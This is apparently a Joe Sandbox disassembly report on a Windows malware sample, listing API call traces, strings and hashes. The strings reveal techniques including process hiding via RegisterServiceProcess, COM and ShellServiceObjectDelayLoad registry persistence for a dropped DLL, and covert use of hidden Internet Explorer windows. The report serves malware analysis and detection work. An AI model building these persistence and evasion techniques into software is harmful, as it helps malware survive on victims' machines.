                            • CreateThread.KERNEL32(00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F84
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F8A
                            • CreateThread.KERNEL32(00000000,00000000,004068B0,00000000,00000000,?), ref: 00406FA3
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,004068B0,00000000,00000000,?,00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406FA9
                            • SetTimer.USER32(00000001,000001F4,00000000,00000000), ref: 00406FBD
                            • TranslateMessage.USER32(?), ref: 00406FC8
                            • DispatchMessageA.USER32(?), ref: 00406FD7
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00406FE6
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Handle$CloseCreatesprintf$MessageVersionrand$FileLoadModuleMutexProcessThread$AddressClassCopyCountCurrentCursorDirectoryDispatchExecExitGlobalIconMemoryNameObjectOpenProcRegisterStatusStockSystemTickTimerTranslateWindowexitsrand
                            • String ID: %s\%s$%s\%s.exe$2$3$QueenKarton$QueenKarton_12$RegisterServiceProcess$dnkkq.dll$kernel32.dll$kkq32.dll$kkq32.vxd
                            • API String ID: 607501245-2841515530
                            • Opcode ID: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction ID: b1e00ee85c63859ee3f052cf9651ba5d7fc827d99c5bd6e2bd8f21b679fb6b98
                            • Opcode Fuzzy Hash: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction Fuzzy Hash: E691C671F883286ADB10A7759C46FDD76A85B44704F5000BBB508FB2C2D6FC6D448BAE

                            Control-flow Graph

                            APIs
                            • CreateFileA.KERNEL32(69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403642
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseCreateHandleLocalReadSize
                            • String ID:
                            • API String ID: 2632956699-0
                            • Opcode ID: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction ID: fb77f57afc793f1fdbd914af7197191687e2a95eac13cef646675694312e246c
                            • Opcode Fuzzy Hash: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction Fuzzy Hash: 14116531A00208BAEB216E65CC06F9DB7A8DB00765F108576FA10BA2D1D67DAF018B5D

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FA7
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FD4
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00404010
                            • sprintf.CRTDLL(?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404048
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404063
                            • sprintf.CRTDLL(Olijjb32,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404086
                            • WriteFile.KERNEL32(?,0042AA84,00001A01,?,00000000,Olijjb32,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll), ref: 004040A4
                            • CloseHandle.KERNEL32(?,?,0042AA84,00001A01,?,00000000,Olijjb32,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?), ref: 004040BB
                            • sprintf.CRTDLL(?,CLSID\%s\InProcServer32,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,0042AA84,00001A01,?,00000000,Olijjb32,00429080,?,40000000,00000000,00000000,00000002), ref: 004040D3
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: randsprintf$File$CloseCreateHandleWrite
                            • String ID: %s\%s.dll$2$3$Apartment$CLSID\%s\InProcServer32$Olijjb32$Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad$ThreadingModel$Web Event Logger${79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 4269242784-378643607
                            • Opcode ID: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction ID: 8034dccab87c86b1e0d8b3b5755954c703eafec793446a3a0ea57bc4b4fc6a7a
                            • Opcode Fuzzy Hash: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction Fuzzy Hash: E7415771F482286AD7109769EC46BE97AAC8B49304F5400FBB908F72C1D6FC9E458F69

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403CFD
                            • memcpy.CRTDLL(-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403D7A
                            • memset.CRTDLL(00406DCE,00000000,0000000C,-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080), ref: 00403D8F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DF6
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DFE
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E1F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E27
                            • memcpy.CRTDLL(-0042AA4C,0042AA44,00000040,?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE), ref: 00403E52
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: rand$memcpy$memset
                            • String ID: +Z})
                            • API String ID: 1341957784-4018127762
                            • Opcode ID: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction ID: df63eb390851271c68cbd719fcc6126871763b87c01c507511359465d0d2d2d2
                            • Opcode Fuzzy Hash: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction Fuzzy Hash: A4719E31F042159BCB10CF69DD42A9E7BF5AF88354F584076E901B77A0D23CAA16CBAD

                            Control-flow Graph

                            APIs
                            • RegCreateKeyExA.ADVAPI32(69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001,00006A14,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,?,004040F5), ref: 00404189
                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001), ref: 004041AB
                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72), ref: 004041B9
                            Strings
                            • {79FEACFF-FFCE-815E-A900-316290B5B738}, xrefs: 0040414D
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: {79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 1818849710-4250702572
                            • Opcode ID: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction ID: 412fd7a6ac4860a679fa2010a2fd1b93dd732dea722ee027fa7473d1befc18ea
                            • Opcode Fuzzy Hash: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction Fuzzy Hash: A7018472B00108BBEB114A95CC02FFEBA6AEF44764F250065FA00B71D1C6B1AE519754

                            Control-flow Graph

                            APIs
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseHandleLocalReadSize
                            • String ID:
                            • API String ID: 341201350-0
                            • Opcode ID: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction ID: f40f052c398d65a7c82f7348c4b70b1bbd35af8546e58ac1d0fc8a8e918c22c0
                            • Opcode Fuzzy Hash: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction Fuzzy Hash: 4EF01C76F04504BAEB01ABA58C02BDD77789B04319F108467F604B62C1D27D6B119B6E

                            Control-flow Graph

                            APIs
                            • GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                            • strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                            • GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CommandHandleLineModulestrchr
                            • String ID:
                            • API String ID: 2139856000-0
                            • Opcode ID: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction ID: bd194e91918afd51b414fff694719a57869652e1cfdb10064340714cce8cfdd4
                            • Opcode Fuzzy Hash: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction Fuzzy Hash: 98F062D1E2C28124FF3162764C4673FAD8A9782754F281477E482F62C2E5BCAD52922B

                            Control-flow Graph

                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmp
                            • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction ID: 1ee26eb31ace3a5089fdf6d32769bdd241f616d51084a453fd18da055c90a8b4
                            • Opcode Fuzzy Hash: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction Fuzzy Hash: 52F09670F44300BBDB206F55DD03F167AA8EB08F1CF90002AFA44611D1D67D6420569F

                            Control-flow Graph

                             • Graph: block 40121f-40127f (__GetMainArgs, call 407980) -> block 401284-401293 (exit)
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                             • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp
                             • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmp
                             • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmp
                             • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmp
                             • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction ID: 22fee5bca0d1ee63cc250ffe024ab50772efda8fe48dde45178863df2fdfff2b
                            • Opcode Fuzzy Hash: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction Fuzzy Hash: BEF090B0F44300BBDA206F55AC03F1A7AA8EB08B1CFA0002AFA44611E1DA7D6420569F

                            Control-flow Graph

                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405181
                            • lstrlenA.KERNEL32(?,?), ref: 00405195
                            • lstrlenA.KERNEL32(?,?,?), ref: 004051A6
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 004051C4
                            • lstrlenA.KERNEL32(?,?,?,?,?), ref: 004051D5
                            • lstrlenA.KERNEL32(?,?,?,?,?,?), ref: 004051E6
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405218
                            • memset.CRTDLL(?,00000000,00000010,?,?,?,?,?,?), ref: 0040522E
                            • GetTickCount.KERNEL32 ref: 00405239
                            • srand.CRTDLL(00000000,?,00000000,00000010,?,?,?,?,?,?), ref: 0040523F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040526C
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?), ref: 00405290
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052D4
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                             • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp
                             • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmp
                             • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmp
                             • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmp
                             • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$FreeLocal$CountEnvironmentExpandIncrementInterlockedOpenStringsTickmemsetsrand
                            • String ID: %s%u - Microsoft Internet Explorer$7O{M$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 2987844104-963083691
                            • Opcode ID: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction ID: eaf183550e18aa99804e3b29fd782d62b91feccc71c8544a1a81296d936fe118
                            • Opcode Fuzzy Hash: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction Fuzzy Hash: 8E91B471E092186BDF20EB65CC49BDEB779AF40308F1440F6E208B61D1DAB96EC58F59
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405C3C
                            • GetTickCount.KERNEL32 ref: 00405C54
                            • srand.CRTDLL(00000000,?), ref: 00405C5A
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405C69
                            • memset.CRTDLL(?,00000000,00000010,0042C48C,00000000,?), ref: 00405C7F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,00000000,?), ref: 00405CC2
                              • Part of subcall function 0040570C: GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,.htm), ref: 00405764
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,<html>), ref: 00405778
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405786
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057AC
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057BE
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057E7
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405805
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,<head>), ref: 00405819
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405827
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405845
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 0040584D
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405CF7
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D0A
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D2B
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405D95
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DA8
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DCA
                            • FindWindowA.USER32(IEFrame,?), ref: 00405DED
                            • Sleep.KERNEL32(000003E8,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405DFD
                            • Sleep.KERNEL32(0000F000,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405E20
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405E38
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00405E85
                            • DeleteFileA.KERNEL32(?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EA4
                            • lstrlenA.KERNEL32(<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EAE
                            • strncmp.CRTDLL(00000000,<HTML><!--,00000000,<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000), ref: 00405EBA
                            • lstrlenA.KERNEL32(<HTML><!--,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405ECB
                            • LocalFree.KERNEL32(00000000,?,?,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000), ref: 00405F0F
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F2B
                            • TerminateProcess.KERNEL32(?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F38
                            • CloseHandle.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F49
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.1982942456.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000004.00000002.1982926003.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                             • Associated: 00000004.00000002.1982959568.000000000042A000.00000004.00000001.01000000.00000007.sdmp
                             • Associated: 00000004.00000002.1982981112.000000000042E000.00000020.00000001.01000000.00000007.sdmp
                             • Associated: 00000004.00000002.1982997408.000000000042F000.00000002.00000001.01000000.00000007.sdmp
                             • Associated: 00000004.00000002.1983015064.0000000000436000.00000020.00000001.01000000.00000007.sdmp
                             • Associated: 00000004.00000002.1983031337.0000000000438000.00000002.00000001.01000000.00000007.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_4_2_400000_Oglabl32.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$Filelstrlensprintf$CloseDeleteHandleProcessSleepThreadWindowmemset$CopyCountCreateCurrentDesktopEnvironmentExpandFindFreeIncrementInterlockedLocalOpenPathStringsTempTerminateTextTicksrandstrncmp
                            • String ID: %s%u - Microsoft Internet Explorer$<HTML><!--$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 4103625910-1993706416
                            • Opcode ID: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
